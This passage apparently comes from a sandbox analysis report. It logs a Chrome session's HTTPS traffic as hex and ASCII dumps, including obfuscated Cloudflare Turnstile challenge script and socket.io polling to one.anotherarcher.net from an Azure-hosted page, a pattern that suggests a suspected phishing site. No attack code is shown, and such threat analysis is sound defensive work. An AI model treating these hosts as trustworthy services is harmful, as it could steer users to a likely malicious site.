                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                126192.168.2.44988579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:35 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB7eU&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:38 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                127192.168.2.449887104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd86f5fc70ca2&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:37 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 115709
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd876d8df0f71-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 73 75 63
                                                                                                                                                                                                                                Data Ascii: tekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_refresh":"Refresh","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_suc
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 39 36 38 39 37 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 38 35 38 29 5d 2c 65 4d 5b 67 49 28 31 31 33 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 56 2c 65 29 7b 65 3d 28 67 56 3d 67 49 2c 7b 27 50 68 67 78 45 27 3a 67 56 28 32 35 33 29 2c 27 6f 78 4f 77 65 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 67 56 28 32 35 33 29 3d 3d 3d 65 5b 67 56 28 35 36 37 29 5d 3f 65 51 28 63 29 3a 76 6f 69 64 20 30 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 65 4f 28 65 5b 67 56 28 31 35 39 34 29 5d 28 65 50 2c 63 29 29 7d 7d 2c 65 52 3d 66 75 6e 63 74
                                                                                                                                                                                                                                Data Ascii: }catch(g){e.push(e.shift())}}(a,996897),eM=this||self,eN=eM[gI(858)],eM[gI(1139)]=function(c,gV,e){e=(gV=gI,{'PhgxE':gV(253),'oxOwe':function(g,h){return g(h)}});try{return gV(253)===e[gV(567)]?eQ(c):void 0}catch(h){return eO(e[gV(1594)](eP,c))}},eR=funct
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 53 79 7a 6c 79 27 3a 67 57 28 31 35 37 35 29 2c 27 5a 69 59 79 66 27 3a 67 57 28 31 30 38 36 29 2c 27 42 58 62 42 6d 27 3a 67 57 28 33 32 39 29 2c 27 56 70 74 61 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 57 4f 75 53 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 53 76 6e 6a 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 44 47 58 73 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 48 6a 55 44 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 71 69 57 74 4f 27 3a 66 75 6e 63 74
                                                                                                                                                                                                                                Data Ascii: h,i){return h===i},'Syzly':gW(1575),'ZiYyf':gW(1086),'BXbBm':gW(329),'VptaC':function(h,i){return h>i},'WOuSu':function(h,i){return h(i)},'SvnjI':function(h,i){return h<i},'DGXsO':function(h,i){return h(i)},'iHjUD':function(h,i){return i!=h},'qiWtO':funct
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 31 32 31 35 29 5d 28 52 2c 31 29 2c 64 5b 67 5a 28 38 39 32 29 5d 28 4c 2c 64 5b 67 5a 28 31 31 38 39 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 36 39 39 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 52 3d 31 2c 43 3d 30 3b 64 5b 67 5a 28 31 35 31 31 29 5d 28 43 2c 49 29 3b 4b 3d 64 5b 67 5a 28 37 33 36 29 5d 28 64 5b 67 5a 28 38 34 35 29 5d 28 4b 2c 31 29 2c 52 29 2c 4c 3d 3d 64 5b 67 5a 28 31 31 38 39 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 36 39 39 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 52 3d 46 5b 67 5a 28 31 33 30 33 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 67 5a 28 32 32 31 29 5d 28 31 36 2c 43 29 3b 4b
                                                                                                                                                                                                                                Data Ascii: 1215)](R,1),d[gZ(892)](L,d[gZ(1189)](o,1))?(L=0,J[gZ(699)](s(K)),K=0):L++,R>>=1,C++);}else{for(R=1,C=0;d[gZ(1511)](C,I);K=d[gZ(736)](d[gZ(845)](K,1),R),L==d[gZ(1189)](o,1)?(L=0,J[gZ(699)](s(K)),K=0):L++,R=0,C++);for(R=F[gZ(1303)](0),C=0;d[gZ(221)](16,C);K
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 34 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 36 39 39 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 47 2d 2d 2c 47 3d 3d 30 26 26 49 2b 2b 7d 65 6c 73 65 20 52 5b 67 5a 28 31 32 30 34 29 5d 5b 67 5a 28 31 31 31 30 29 5d 28 42 5b 67 5a 28 31 34 37 32 29 5d 29 7d 66 6f 72 28 52 3d 32 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 67 5a 28 37 33 36 29 5d 28 64 5b 67 5a 28 31 30 33 36 29 5d 28 4b 2c 31 29 2c 64 5b 67 5a 28 31 32 31 35 29 5d 28 52 2c 31 29 29 2c 64 5b 67 5a 28 31 35 36 31 29 5d 28 4c 2c 64 5b 67 5a 28 31 30 31 36 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 67 5a 28 36 39 39 29 5d 28 64 5b 67 5a 28 38 30 37 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 52 3e 3e 3d 31 2c 43 2b 2b 29 3b 66
                                                                                                                                                                                                                                Data Ascii: 4)](o,1)?(L=0,J[gZ(699)](s(K)),K=0):L++,R>>=1,C++);G--,G==0&&I++}else R[gZ(1204)][gZ(1110)](B[gZ(1472)])}for(R=2,C=0;C<I;K=d[gZ(736)](d[gZ(1036)](K,1),d[gZ(1215)](R,1)),d[gZ(1561)](L,d[gZ(1016)](o,1))?(L=0,J[gZ(699)](d[gZ(807)](s,K)),K=0):L++,R>>=1,C++);f
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 33 5d 3d 4d 2c 44 5b 68 33 28 36 39 39 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 39 30 31 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 64 5b 68 33 28 36 33 32 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 33 28 34 36 36 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 39 33 37 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 33 28 38 37 38 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 39 30 31 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 33 28 36 33 32 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c
                                                                                                                                                                                                                                Data Ascii: 3]=M,D[h3(699)](M);;){if(I>i)return'';for(J=0,K=Math[h3(901)](2,C),F=1;d[h3(632)](F,K);L=d[h3(466)](G,H),H>>=1,0==H&&(H=j,G=d[h3(937)](o,I++)),J|=d[h3(878)](0<L?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[h3(901)](2,8),F=1;d[h3(632)](F,K);L=G&H,H>>=1,
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 61 28 31 34 32 32 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 48 2b 31 5d 3f 47 5b 68 61 28 31 32 37 31 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 38 28 31 35 39 30 29 5d 5b 68 38 28 38 32 34 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 38 28 31 34 32 32 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 65 56 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 38 28 31 31 36 33 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 38 28 33 33 36 29 5d 28 6f 5b 68 38 28 31 30 38 37 29 5d 2c 69 2b 44 29 3f 73 28 69 2b 44 2c 45 29 3a 46 7c 7c 6f 5b 68 38 28 31 36 32 32 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 68 38 28
                                                                                                                                                                                                                                Data Ascii: a(1422)];G[H]===G[H+1]?G[ha(1271)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[h8(1590)][h8(824)](B),C=0;C<x[h8(1422)];D=x[C],E=eV(g,h,D),B(E)?(F=E==='s'&&!g[h8(1163)](h[D]),o[h8(336)](o[h8(1087)],i+D)?s(i+D,E):F||o[h8(1622)](s,i+D,h[D])):s(o[h8(
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 49 2c 6a 3d 7b 7d 2c 6a 5b 68 65 28 31 35 33 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 7c 7c 47 7d 2c 6a 5b 68 65 28 31 34 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 65 28 31 33 30 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 65 28 39 35 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 65 28 31 32 30 36 29 5d 3d 68 65 28 31 34 35 35 29 2c 6a 5b 68 65 28 33 30 32 29 5d 3d 68 65 28 33 36 37 29 2c 6a 5b 68 65 28 31 35 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 6b 5b 68 65 28 31
                                                                                                                                                                                                                                Data Ascii: I,j={},j[he(1534)]=function(F,G){return F||G},j[he(1408)]=function(F,G){return F+G},j[he(1308)]=function(F,G){return F+G},j[he(955)]=function(F,G){return F+G},j[he(1206)]=he(1455),j[he(302)]=he(367),j[he(1520)]=function(F,G){return F+G},j);try{if(l=k[he(1
                                                                                                                                                                                                                                2024-10-03 20:57:37 UTC1369INData Raw: 31 33 32 38 29 5d 28 68 5b 68 66 28 31 35 36 32 29 5d 2c 63 29 2c 68 5b 68 66 28 31 33 32 38 29 5d 28 68 66 28 33 37 34 29 2c 64 29 2c 68 66 28 39 33 38 29 2b 65 2c 68 5b 68 66 28 31 33 32 38 29 5d 28 68 5b 68 66 28 35 31 38 29 5d 2c 66 29 2c 68 5b 68 66 28 31 33 32 38 29 5d 28 68 66 28 31 35 30 36 29 2c 4a 53 4f 4e 5b 68 66 28 37 32 31 29 5d 28 67 29 29 5d 5b 68 66 28 31 35 36 35 29 5d 28 68 5b 68 66 28 31 31 32 38 29 5d 29 2c 65 4d 5b 68 66 28 32 33 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 68 29 7b 68 68 3d 68 66 2c 65 4d 5b 68 68 28 36 39 35 29 5d 28 6b 2c 75 6e 64 65 66 69 6e 65 64 2c 68 68 28 31 33 33 39 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 66 28 32 33 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 69 29 7b 68 69 3d 68 66 2c 65 4d 5b 68 69 28 31 32 39 39
                                                                                                                                                                                                                                Data Ascii: 1328)](h[hf(1562)],c),h[hf(1328)](hf(374),d),hf(938)+e,h[hf(1328)](h[hf(518)],f),h[hf(1328)](hf(1506),JSON[hf(721)](g))][hf(1565)](h[hf(1128)]),eM[hf(236)](function(hh){hh=hf,eM[hh(695)](k,undefined,hh(1339))},10),eM[hf(236)](function(hi){hi=hf,eM[hi(1299


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                128192.168.2.449888104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:38 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: ri2Zdj3M5IqCov32kMoZlt5Zwz15DWjgWSU=$bCyQIiwdmc7I50gw
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd87ecbc372a5-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                129192.168.2.44988979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB7M_&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:38 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                130192.168.2.44989079.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB7N0&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:38 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                131192.168.2.449891104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
